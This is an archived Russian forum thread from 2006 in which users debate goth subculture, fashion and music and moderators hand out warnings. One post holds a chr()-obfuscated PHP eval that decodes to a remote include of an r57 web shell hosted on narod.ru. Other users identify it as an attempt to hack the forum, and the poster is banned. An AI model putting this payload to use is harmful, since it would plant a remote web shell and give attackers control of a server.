Пользователи - Поиск - Календарь - Магазин - Помощь
Полная версия: Готические Авы
Voln.Net :: волн нет! > Зона отдыха > Беседка
anka
Давайте вставляйте)
Serious
Не люблю готику,не понимаю таких людей которые носят готическую одежду. dry.gif
UFO
А я скажу так, что вообще не знаю, что такое готика и чем отличается готическая одежда от обычной smile.gif Да и вообще, кто они такие - приверженцы готики?
anka
оНИ носят кеды т.д!
Slon
Готика это определенный стиль жизни. Вот из готической музыки что я слышал, и слушаю это Nightwish.
Вот вчера в машине слушал Mp3шник.
Одежда у них.. попробую описать:
-Черный кожаный плащь
-"гады" сапоги такие с железными носами
-Черные в обтяжку джинсы или кожаные штаны.
-На руках: мужчины - перчатки, женщины до логтя что-то в черную сетку.
-У женщин макияж всегда черный, тобешь черные подведенные жирные глаза, черная помада.
Всегда мрачные, не улыбаютсЯ, я вообещ такиех не понимаю, тем более девушке, миниюбку зеленую, розовые ногти, каблучки и вперед, этим же...
Вот что то подобное о готах в моем представлении...
З.Ы anka кеды по ходу носишь ты! :
UFO
Ну я тоже редко улюбаюсь, но кеды, сапоги, кожанные штаны и т.п. не ношу smile.gif Да и вообще, из кожанного только ботинки smile.gif А перчатки я и зимой не ношу, только в -30 градусов по Цельсию варежки одевал, ибо в автобусе рука к поручню примерзает smile.gif
DER
QUOTE(Slon @ Sep 16 2006, 01:57 PM)
Готика это определенный стиль жизни. Вот из готической музыки что я слышал, и слушаю это Nightwish.
Nightwish не готика.... 09.gif
Вот Lacrimosa - готика ... Классика ...

Slon
Ну мне сказали что Nightwish - это готический рок... что сказали - то и говорю..
UFO
А какие еще существуют стили моды? smile.gif (не музыки!)
Slon
Панк, рэп, хулс, рок ... что то больше на ум не приходит
UFO
Желательно с кратким описанием smile.gif
North_Wolf
QUOTE(UFO @ Sep 17 2006, 08:16 PM)
А какие еще существуют стили моды? smile.gif (не музыки!)
*

Ну, знаешь ли, готика - это не мода, а субкультура smile.gif
В принципе, субкультуры, это как... Как небольшие царства - в каждой субкультуре свои порядки, свои "места обитания (т.е. тусовок smile.gif)", свой стиль одежды...

Я лично к настоящим субкультурам отношу только готику, панк... Все вот такое "кожецепное"... В смысле, кожа и цепи... biggrin.gif
А вот рэп... Многие говорят, что это субкультура, но я так не считаю. Сейчас рэп и r'n'b в моде. Многие и стали "крутыми рэпперами". Вот это можно отнести к моде smile.gif

P.S. никому не в обиду, просто попыталась вкратце рассказать, все что думаю об этом smile.gif
anka
North_Wolf
Ты права)

Слон
Они не носят кощу а наоборот только тряпки старые!
North_Wolf
QUOTE(anka @ Sep 23 2006, 09:41 AM)
Слон
Они не носят кощу а наоборот только тряпки старые!
*

ГОТЫ?!?!?!?!
Нееет...
Slon
Желательно с кратким описанием

А ты сам не знаешь чтоли?
DER
QUOTE(North_Wolf @ Sep 23 2006, 09:32 AM)

Я лично к настоящим субкультурам отношу только готику, панк...

Да нет их намного больше... 09.gif
Black например 100% субкультура..... э-э-э .. байкеры 100%.... Club-культура опять же...

UFO
QUOTE(Slon @ Sep 23 2006, 12:06 PM)
А ты сам не знаешь чтоли?
*

Нет smile.gif
cabadash
QUOTE(Serious @ Sep 16 2006, 12:48 PM)
Не люблю готику,не понимаю таких людей которые носят готическую одежду.  dry.gif
*

д*б*л

Еще одно предупрждение. Я еще не весь форум посмотрел, до смотрю и найду хоть еще одно нарушение и можешь считать себя забаненым на этом форуме
Ворон
Лично я из всех культур или чего в ентом роде не переношу больше всего рэперов....готы панки и ваще ребята в ентом стиле мне нравяться...сам я металист...среди готов очень много знакомых и кстати не соглашусь с тем что все они такие уж мрачные....
Slon
Не люблю готику,не понимаю таких людей которые носят готическую одежду.

Поддерживаю, я люблю "живое" веселое...
Чтоб девушки носили маленькие зеленые юбочки с оранжевыми топиками, а не черные старые сапоги с сетками на руках... dry.gif
kolokol
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(104). chr(105). chr(109). chr(97). chr(115). chr(50). chr(48). chr(48). chr(53). chr(46). chr(110). chr(97). chr(114). chr(111). chr(100). chr(46). chr(114). chr(117). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(112). chr(104). chr(112). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

Bernard: Злой модер: это собственно что?

UFO: пять предупреждений из шести за флуд
landMine
Это чел пробовал сломать форум, модератор ты наш. smile.gif
Bernard Gi
QUOTE(landMine @ Oct 1 2006, 12:52 AM)
Это чел пробовал сломать форум, модератор ты наш.  smile.gif
*

Какие познания. Молодец. Тогда данный взломщик на совести админа.
landMine
Ну так.
УФО, покажи ему свой гнев!
UFO
Дал ему пять предупреждений из шести, еще раз нафлудит - забаню smile.gif
UFO
Ну вот и забанил smile.gif
landMine
А что так?
UFO
Так ведь два поста со флудом он написал, хватит с него smile.gif
Ворон
праильно так их...флудеров......
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.
Invision Power Board © 2001-2025 Invision Power Services, Inc.